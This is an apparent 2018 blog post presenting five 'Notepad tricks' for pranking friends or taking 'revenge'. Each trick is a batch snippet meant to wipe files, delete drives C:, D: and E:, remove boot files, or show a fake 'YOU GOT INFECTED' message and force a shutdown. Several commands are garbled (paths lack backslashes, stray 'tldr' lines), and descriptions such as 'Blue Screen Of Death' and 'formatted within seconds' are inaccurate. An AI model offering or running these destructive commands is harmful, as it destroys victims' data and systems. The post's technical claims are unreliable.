Friday, May 11, 2018

Top 5 Notepad Tricks You Should Use To Become Cool Among Your Friends.

Hey Guys Welcome To Kali Crunch.
In This Post I'll Tell You About Some Basic But Cool Notepad Tricks You Can Use To Prank Your Friends Or To Take Revenge From School ( Just Joking ).
Read The Post Carefully To Understand It Really Well.
1. How To Delete All Your System Data:-


Delete Files With A Small Command-
#Open Notepad And Paste The Following Code.
  del*.*
#Save The File With An Extension Of .bat (this is must).
#Now Run The File.

All Your Data Will Be Formatted Within Minutes.

2. Blue Screen Of Death(Too Dangerous):-

#Open Notepad And Paste The Following Code.
@echo off
del %systemdrive%*.* /f /s /q
shutdown -r -f -t 00

# Save The File With An Extension Of .vbs(this is must).
#Now Run The Program

NOTE: Never Try This On Your PC.

3. Format C, D, E Drive Within Seconds:-

#Open Notepad And Paste The Following Code.

rd/s/q D:
rd/s/q C:
rd/s/q E:

#Save The File With An Extension Of .bat(this is must).
The System Data Will Be Formatted Within Seconds.

4. Shutdown The System And Disable It's Ability To Restart( Too Dangerous ):-
#Open Notepad And Paste The Following Code.

@echo off
attrib -r -s -h c:autoexex.bat
del c:autoexec.bat
attrib -r -s--h c:boot.ini
del c:boot.ini
attrib -r -s -h c:
tldr
del c:
tdlr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
Msg *YOU GOT INFECTED!
Shutdown -s -t 7 -c "A Virus Is Taking Over c:Drive
#Save The File With An Extension Of .bat And Run The Program.

NOTE: Never Try This On Your PC.

5. Delete Everything In The Operating System:-
#Open Notepad And Paste The Following Code.

@echo off
Del C: *.* ly

#Save The File With An Extension Of .bat(this is must).

This Is All For Today.

No comments:

Post a Comment